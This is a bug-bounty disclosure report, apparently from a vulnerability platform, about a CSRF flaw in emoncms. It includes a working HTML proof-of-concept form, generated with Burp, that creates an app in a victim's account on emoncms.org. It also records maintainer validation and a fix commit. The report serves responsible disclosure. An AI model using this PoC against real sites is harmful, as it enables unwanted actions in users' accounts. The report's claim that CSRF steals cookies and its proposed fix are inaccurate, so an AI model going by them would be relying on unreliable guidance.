Cross-Site Request Forgery (CSRF) in emoncms/emoncms

Valid

Reported on

Jul 15th 2021

✍️ Description

In CSRF attack if your users going to attacker website and click the mallicouse link then they able to steal users cookie, submit unwanted date, ....

🕵️‍♂️ Proof of Concept

1.you login in your account 2.you make a file contain the following html file. 3.open html ( as victim site) 4.client without any more interaction create unwanted App named My Energy3

// PoC.html

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://emoncms.org/app/add">
      <input type="hidden" name="name" value="My&#32;Energy3" />
      <input type="hidden" name="app" value="myenergy" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

💥 Impact

the attacker can create any App in the victim user's account.

Fix

you can set cookies on a custom header. this is a fastest way that you can protect your users

Occurrences

profile.php L1

amammad modified the report

2 years ago

We have contacted a member of the emoncms team and are waiting to hear back 2 years ago

A emoncms/emoncms maintainer validated this vulnerability 2 years ago

amammad has been awarded the disclosure bounty

The fix bounty is now up for grabs

A emoncms/emoncms maintainer

commented 2 years ago

Great thanks amammad, I will take a look at this and your other similar CSRF vulnerability and get back to you shortly

A emoncms/emoncms maintainer marked this as fixed with commit ca1f5c 2 years ago

The fix bounty has been dropped

This vulnerability will not receive a CVE

to join this conversation